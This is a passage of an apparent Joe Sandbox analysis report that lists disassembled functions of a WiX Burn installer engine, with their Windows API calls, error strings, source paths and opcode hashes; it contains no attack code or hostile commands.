                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed dependents check on package provider: %ls$comres.dll$d:\a\wix4\wix4\src\burn\engine\dependency.cpp$wininet.dll
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-2816589420
                                                                                                                                                                                                                                                                            • Opcode ID: 438074ee4fdaad1290e2614bc8bad86b2dbb8e1e2c0d5b602fa1bceeae68e4de
                                                                                                                                                                                                                                                                            • Instruction ID: d3c6156161364a0f9e160f4a89b5618808e306b010ef401d137050bfd73f8d6c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 438074ee4fdaad1290e2614bc8bad86b2dbb8e1e2c0d5b602fa1bceeae68e4de
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE518330A05616EFCB18DF98C888BAEBBB9FF85714F104219E5659B281C3709991CFD1
                                                                                                                                                                                                                                                                            Function 008F8201 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 104registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,Resume,00000000,?,?,00000001,?,00000000,00000000,00000024,?,?,?,00905E95,000000F8), ref: 008F8317
                                                                                                                                                                                                                                                                              • Part of subcall function 0093CCD3: RegQueryValueExW.ADVAPI32(?,?,?,008F828D,?,Resume,00000000,?,?,00000001,?,00000000,00000000,00000024), ref: 0093CD06
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 008F825C
                                                                                                                                                                                                                                                                            • Resume, xrefs: 008F8280
                                                                                                                                                                                                                                                                            • Failed to open registration key., xrefs: 008F824A
                                                                                                                                                                                                                                                                            • Failed to read Resume value., xrefs: 008F82AE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                                                                                                                                            • String ID: Failed to open registration key.$Failed to read Resume value.$Resume$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3356406503-1502274520
                                                                                                                                                                                                                                                                            • Opcode ID: 4f096ba177a1cb18f982e91b1f437bed52d925ba12b49a4bb6a1a4986e21ba22
                                                                                                                                                                                                                                                                            • Instruction ID: 06358c04f2213c5cfc3d69817d2c8d909d6146376604d18e9f98547fea2bef82
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f096ba177a1cb18f982e91b1f437bed52d925ba12b49a4bb6a1a4986e21ba22
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E31B231640A1DEBD7228EB9CC4ABBA7B64FF45714F114165FE01EB360DA71AE40D750
                                                                                                                                                                                                                                                                            Function 0094729B Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 96registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0093CBC2: RegOpenKeyExW.KERNELBASE(?,0093CBBE,00000000,00000000,00000003,00000000,?,?,00946603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0093CBED
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00020019,?,?,008E6E9A,00000001,008E6DEA), ref: 00947376
                                                                                                                                                                                                                                                                              • Part of subcall function 009471E2: RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,008E6E9A,?,00020019,?,00000000,00000000,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,?,?), ref: 0094728C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 009472C5
                                                                                                                                                                                                                                                                            • Failed to enumerate uninstall key for related bundles., xrefs: 0094738C
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp, xrefs: 00947308
                                                                                                                                                                                                                                                                            • Failed to open uninstall registry key., xrefs: 009472F9
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close$Open
                                                                                                                                                                                                                                                                            • String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2976201327-4270664815
                                                                                                                                                                                                                                                                            • Opcode ID: afa1abd1518901facce974a2fe825639b088952ec590384564daf0a20cea1f2f
                                                                                                                                                                                                                                                                            • Instruction ID: fcb58542b26ed9be524507779f941ec14926d03e39b3bccaebec332ac5177121
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: afa1abd1518901facce974a2fe825639b088952ec590384564daf0a20cea1f2f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A21F232E4822DFADB219EE59C46F9EFAACEB44700F154461BE11BA051D3B58E40AB90
                                                                                                                                                                                                                                                                            Function 0093A0F5 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memcpy_s
                                                                                                                                                                                                                                                                            • String ID: Failed to ensure buffer size.$Failed to get string size.$Failed to write string to buffer: '%ls', error: %d$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\buffutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2001391462-4099103365
                                                                                                                                                                                                                                                                            • Opcode ID: dd47b63d5ee5d3efccd59d6fb75ea1701d373d0cd0b358ceb7bce8b75b0d7121
                                                                                                                                                                                                                                                                            • Instruction ID: 540d4484a44c135ecdb7f9a5b6987a934dfdfd551f2ec6c0d5caddb7580473d6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd47b63d5ee5d3efccd59d6fb75ea1701d373d0cd0b358ceb7bce8b75b0d7121
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D221C372A04219BFEB109F88CC86FAB7B6CEF06754F104114FA14AB381E2709D10DBA1
                                                                                                                                                                                                                                                                            Function 008E5B8D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Failed to get full path for: %ls$Failed to get parent directory for path: %ls$Full path was not rooted: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-281674368
                                                                                                                                                                                                                                                                            • Opcode ID: e8d1ce8996fb3c9d5b5e7ee624671bee29c763dc112a938a8a2acf31893d1f6b
                                                                                                                                                                                                                                                                            • Instruction ID: ec14334dd6e3d0ddfe80b5e227ffa86406ba6ed35ac41fee2dde1e2fd0865eb8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8d1ce8996fb3c9d5b5e7ee624671bee29c763dc112a938a8a2acf31893d1f6b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8821A871700788B6EF10DAA7CD5AF9F7ABCFB82B08F100155BA05E6191E6B1DA40D661
                                                                                                                                                                                                                                                                            Function 00900A39 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,55000CC2,000000FF,FFBC8CE8,000000FF,008E6CF2,5600950C,F685F08B,00000000,00000000,008E721E,008E7222,008E7162,00000000,008E6DEA), ref: 00900AFF
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,8351EC8B,000000FF,FFBC8CE8,000000FF,008E6CF2,5600950C,F685F08B,00000000,00000000,008E721E,008E7222,008E7162,00000000,008E6DEA), ref: 00900B2B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\dependency.cpp, xrefs: 00900A61
                                                                                                                                                                                                                                                                            • Failed to detect provider key bundle id., xrefs: 00900A4F
                                                                                                                                                                                                                                                                            • Failed dependents check on bundle., xrefs: 00900AAE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed dependents check on bundle.$Failed to detect provider key bundle id.$d:\a\wix4\wix4\src\burn\engine\dependency.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-872169753
                                                                                                                                                                                                                                                                            • Opcode ID: 0e95c3e9df563084c83a8e8093adbcb80a511fe2ea1bfabca69cfe148f64d844
                                                                                                                                                                                                                                                                            • Instruction ID: 40424b7c860bbdcf70503fdfd5b6b9feb6bed164d8e29d1671f74a2d6e6df766
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e95c3e9df563084c83a8e8093adbcb80a511fe2ea1bfabca69cfe148f64d844
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0731AF31A44225FFEF219F94CC4AF9ABA68BB44724F204345F5146B1D1D3B0AE90DBD1
                                                                                                                                                                                                                                                                            Function 0093A1E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 92COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memcpy_s
                                                                                                                                                                                                                                                                            • String ID: Failed to ensure buffer size.$Failed to get string size.$Failed to write string to buffer: '%hs', error: %d$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\buffutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2001391462-3750679403
                                                                                                                                                                                                                                                                            • Opcode ID: f775457619cb8f1456341480d1618ecbb61b1111a51cdf219a3ef96731d6ba35
                                                                                                                                                                                                                                                                            • Instruction ID: 2640dea543eb9f1cea6fe18f430710393918861ed7d1d0b04c76faa39ec4d42b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f775457619cb8f1456341480d1618ecbb61b1111a51cdf219a3ef96731d6ba35
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72210A72A00254BBEB119E49CC4AFAF7AACEF87764F010111F914EB281E271DD00DAA2
                                                                                                                                                                                                                                                                            Function 0093BCAF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0093BCD0
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0093BCDA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastLookupPrivilegeValue
                                                                                                                                                                                                                                                                            • String ID: Failed to get privilege LUID: %ls$Failed to get token privilege information.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2626710698-2191672025
                                                                                                                                                                                                                                                                            • Opcode ID: e0472e0d99782600b5583cbb644d461ef0be7ca7aab2ce27ddb21a4bd2bcabdb
                                                                                                                                                                                                                                                                            • Instruction ID: c26add95175d6df6834f7b0a69776c99e8995e520d778bd170589113861a5551
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0472e0d99782600b5583cbb644d461ef0be7ca7aab2ce27ddb21a4bd2bcabdb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0021A6B2A00218BBDB219A49DC85EAE77BCEF55710F014051FF14EB291D3749E008FA1
                                                                                                                                                                                                                                                                            Function 0090FC87 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?), ref: 0090FCBA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to detect dependencies for related bundle., xrefs: 0090FD50
                                                                                                                                                                                                                                                                            • Failed to ensure there is space for related bundles., xrefs: 0090FCE5
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\relatedbundle.cpp, xrefs: 0090FD30, 0090FD62
                                                                                                                                                                                                                                                                            • Failed to initialize package from related bundle id: %ls, xrefs: 0090FD1E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to detect dependencies for related bundle.$Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$d:\a\wix4\wix4\src\burn\engine\relatedbundle.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-344177745
                                                                                                                                                                                                                                                                            • Opcode ID: 23c749c5a4d50aed4e611e532080bf160479437b239b860dbccb9699fc2342ed
                                                                                                                                                                                                                                                                            • Instruction ID: fc4e01888aa9f6453b3a36037422779d97940c1f84ac6baf4a8631b694e5d0db
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23c749c5a4d50aed4e611e532080bf160479437b239b860dbccb9699fc2342ed
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B21B531A40B24BFDF229B94CC46FAABB65EF49720F104261FD10AE1D1E3B0D950DB91
                                                                                                                                                                                                                                                                            Function 0092620A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86synchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(0094E860,000000FF), ref: 009262B4
                                                                                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(0094E860), ref: 009262E2
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000), ref: 009262EB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate buffer.$d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp
                                                                                                                                                                                                                                                                            • API String ID: 944053411-1881421891
                                                                                                                                                                                                                                                                            • Opcode ID: cf65071c5b81732daf645f9a9d0783f077fa5af4f396bd76cc46ebb35f20ebdf
                                                                                                                                                                                                                                                                            • Instruction ID: 9ac38f113ee753f45e57b81cbb424b3f447ed3e26398c53e66c0d40397a2674d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf65071c5b81732daf645f9a9d0783f077fa5af4f396bd76cc46ebb35f20ebdf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4231CCB4A00606FFDB009F68DC48A9EBBF9FF49314F108528F520E7291C3B1AD518BA1
                                                                                                                                                                                                                                                                            Function 008E8306 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,?,008E9840,008E9840,?,008E8154,?,?,00000000), ref: 008E8342
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008E8154,?,?,00000000,?,00000000,008E9840,?,008EB468,?,?,?,?,?), ref: 008E8371
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareErrorLastString
                                                                                                                                                                                                                                                                            • String ID: Failed to compare strings.$d:\a\wix4\wix4\src\burn\engine\variable.cpp$version.dll
                                                                                                                                                                                                                                                                            • API String ID: 1733990998-1162684775
                                                                                                                                                                                                                                                                            • Opcode ID: f8ac1d287f4aa7c4fdcc5b2c89699949d25531cfb0709ad5d2af24fbed7b2011
                                                                                                                                                                                                                                                                            • Instruction ID: 96deaf4cbbf67c1f197bc676ea9abea351fd2f3e7386b0f0290e7acea10e68e9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8ac1d287f4aa7c4fdcc5b2c89699949d25531cfb0709ad5d2af24fbed7b2011
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1421F872A40165FBC7108F9ECD45A6EB7A8FB4BB64F250219F918EB3C0DA70DD0197A0
                                                                                                                                                                                                                                                                            Function 008E165F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WaitForMultipleObjects.KERNEL32(?,?,000000FF,00000000,00000000,?,?,0090EC52,00000002,000000FF,00000000,000000FF,?,?,00000000), ref: 008E1673
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
